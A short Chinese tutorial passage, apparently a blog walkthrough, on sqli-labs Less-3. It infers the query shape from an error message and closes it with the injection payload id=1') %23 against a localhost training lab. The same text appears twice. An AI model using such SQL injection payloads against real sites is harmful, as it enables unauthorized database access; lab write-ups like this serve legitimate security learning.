sqli-labs:Less-3为单引号括号')的字符型注入
首先还是输入:http://localhost/Less-3/?id=1
我们发现报错信息里有"1")这样的信息,可以推断SQL语句为:
select username, password from users where id=('$id')
所以这里我们要使用')来闭合,输入
http://localhost/Less-3/?id=1') %23
我们看到页面正常了
sqli-labs:Less-3为单引号括号')的字符型注入
首先还是输入:http://localhost/Less-3/?id=1
我们发现报错信息里有"1")这样的信息,可以推断SQL语句为:
select username, password from users where id=('$id')
所以这里我们要使用')来闭合,输入
http://localhost/Less-3/?id=1') %23
我们看到页面正常了